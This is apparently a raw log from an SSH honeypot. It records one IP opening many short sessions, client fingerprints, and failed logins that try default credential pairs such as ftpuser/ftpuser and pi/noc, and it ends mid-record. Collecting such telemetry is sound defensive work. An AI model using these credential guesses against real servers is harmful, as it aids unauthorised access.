{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.007275Z","src_ip":"212.227.125.160","session":"a819869ceaa0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.018985Z","src_ip":"212.227.125.160","session":"5512f5b30fab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54064,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf9f84c88470","protocol":"ssh","message":"New connection: 212.227.125.160:54064 (1.2.3.4:22) [session: cf9f84c88470]","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.037046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.055410Z","src_ip":"212.227.125.160","session":"abd2ae84a919"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.056064Z","src_ip":"212.227.125.160","session":"abd2ae84a919"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.081788Z","src_ip":"212.227.125.160","session":"cf9f84c88470"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.087383Z","src_ip":"212.227.125.160","session":"cf9f84c88470"}
{"eventid":"cowrie.login.failed","username":"student","password":"ftpuser","message":"login attempt [student/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.217480Z","src_ip":"212.227.125.160","session":"279a972ff669"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.271570Z","src_ip":"212.227.125.160","session":"5512f5b30fab"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.286505Z","src_ip":"212.227.125.160","session":"e3cd4dd6da29"}
{"eventid":"cowrie.login.failed","username":"noc","password":"student","message":"login attempt [noc/student] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.402232Z","src_ip":"212.227.125.160","session":"a819869ceaa0"}
{"eventid":"cowrie.login.failed","username":"pi","password":"ftpuser","message":"login attempt [pi/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.408796Z","src_ip":"212.227.125.160","session":"abd2ae84a919"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ftpuser","message":"login attempt [ubnt/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.448209Z","src_ip":"212.227.125.160","session":"cf9f84c88470"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.272842Z","src_ip":"212.227.125.160","session":"279a972ff669"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.315973Z","src_ip":"212.227.125.160","session":"5512f5b30fab"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.330380Z","src_ip":"212.227.125.160","session":"e3cd4dd6da29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54078,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb1c9651f7de","protocol":"ssh","message":"New connection: 212.227.125.160:54078 (1.2.3.4:22) [session: cb1c9651f7de]","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.371336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.372301Z","src_ip":"212.227.125.160","session":"cb1c9651f7de"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.421939Z","src_ip":"212.227.125.160","session":"cb1c9651f7de"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.500276Z","src_ip":"212.227.125.160","session":"abd2ae84a919"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.504657Z","src_ip":"212.227.125.160","session":"a819869ceaa0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54082,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e4dd72ec7f2","protocol":"ssh","message":"New connection: 212.227.125.160:54082 (1.2.3.4:22) [session: 2e4dd72ec7f2]","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.560114Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54090,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fa9530943ef","protocol":"ssh","message":"New connection: 212.227.125.160:54090 (1.2.3.4:22) [session: 1fa9530943ef]","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.584244Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.601164Z","src_ip":"212.227.125.160","session":"cf9f84c88470"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.634824Z","src_ip":"212.227.125.160","session":"2e4dd72ec7f2"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.635792Z","src_ip":"212.227.125.160","session":"2e4dd72ec7f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54100,"dst_ip":"1.2.3.4","dst_port":22,"session":"4965b84e022e","protocol":"ssh","message":"New connection: 212.227.125.160:54100 (1.2.3.4:22) [session: 4965b84e022e]","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.686234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.687119Z","src_ip":"212.227.125.160","session":"1fa9530943ef"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.687869Z","src_ip":"212.227.125.160","session":"1fa9530943ef"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.790686Z","src_ip":"212.227.125.160","session":"4965b84e022e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:31.791731Z","src_ip":"212.227.125.160","session":"4965b84e022e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"noc","message":"login attempt [ftpuser/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:32.192300Z","src_ip":"212.227.125.160","session":"cb1c9651f7de"}
{"eventid":"cowrie.login.failed","username":"noc","password":"ftpuser","message":"login attempt [noc/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:32.832422Z","src_ip":"212.227.125.160","session":"1fa9530943ef"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"noc","message":"login attempt [ubnt/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:33.166317Z","src_ip":"212.227.125.160","session":"4965b84e022e"}
{"eventid":"cowrie.login.failed","username":"pi","password":"noc","message":"login attempt [pi/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:33.480488Z","src_ip":"212.227.125.160","session":"2e4dd72ec7f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57574,"dst_ip":"1.2.3.4","dst_port":22,"session":"4170ffb77f1c","protocol":"ssh","message":"New connection: 212.227.125.160:57574 (1.2.3.4:22) [session: 4170ffb77f1c]","sensor":"my-vps","timestamp":"2025-08-26T11:33:33.553691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:33.566177Z","src_ip":"212.227.125.160","session":"4170ffb77f1c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:33.573192Z","src_ip":"212.227.125.160","session":"cb1c9651f7de"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:33:33.612459Z","src_ip":"212.227.125.160","session":"4170ffb77f1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60116,"dst_ip":"1.2.3.4","dst_port":22,"session":"61ccb8764813","protocol":"ssh","message":"New connection: 212.227.125.160:60116 (1.2.3.4:22) [session: 61ccb8764813]","sensor":"my-vps","timestamp":"2025-08-26T11:33:33.625274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:33.740310Z","src_ip":"212.227.125.160","session":"61ccb8764813"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:33.740993Z","src_ip":"212.227.125.160","session":"61ccb8764813"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"www-data","message":"login attempt [www-data/www-data] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:33.820873Z","src_ip":"212.227.125.160","session":"4170ffb77f1c"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:33.986896Z","src_ip":"212.227.125.160","session":"1fa9530943ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60142,"dst_ip":"1.2.3.4","dst_port":22,"session":"5058f3e893e1","protocol":"ssh","message":"New connection: 212.227.125.160:60142 (1.2.3.4:22) [session: 5058f3e893e1]","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.079097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:34.149523Z","src_ip":"212.227.125.160","session":"5058f3e893e1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-c